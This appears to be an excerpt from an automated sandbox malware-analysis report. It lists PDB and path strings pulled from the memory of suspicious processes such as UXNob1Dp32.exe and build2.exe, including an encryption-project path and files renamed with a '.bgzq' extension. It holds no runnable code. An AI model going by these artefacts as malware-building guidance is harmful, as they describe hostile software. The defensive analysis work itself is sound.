Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\c source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\rj source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\WebVi source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: UXNob1Dp32.exe, 00000005.00000003.2170035395.0000000003457000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151477986.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171481315.000000000348D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2169860654.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098524116.0000000003364000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ D source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqqrW source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098947888.0000000003399000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098229104.0000000003390000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: UXNob1Dp32.exe, 00000005.00000003.2176662041.0000000003371000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170142307.0000000003383000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176808323.0000000003388000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\*F source: UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ty source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036F5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Application Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2192611386.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\v4.0\m(4ZV source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ta\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BACKGR~2ntkrnlmp.pdbndTransferApiGroup source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\oft.A source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\1fd79}\n source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\{ source: UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121148461.000000000339F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OptimizationGuidePredictionModels\\bbwe\ation Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000002.2204030109.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2153418605.000000000340F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152535019.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: '{aC:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\2B_cw5 source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\icat source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqy) source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195447541.000000000315E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: UXNob1Dp32.exe, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ta\j source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l2+P source: UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\w source: UXNob1Dp32.exe, 00000005.00000003.2184193882.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2177560413.0000000003160000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175249606.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182377218.0000000003161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.000000000339C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142579467.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UXNob1Dp32.exe, 00000005.00000003.1736142070.00000000097F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorW1,Q source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: UXNob1Dp32.exe, 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2141965591.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142726213.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140931110.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\ source: UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ion Da source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\~18DQ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408904996229952.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
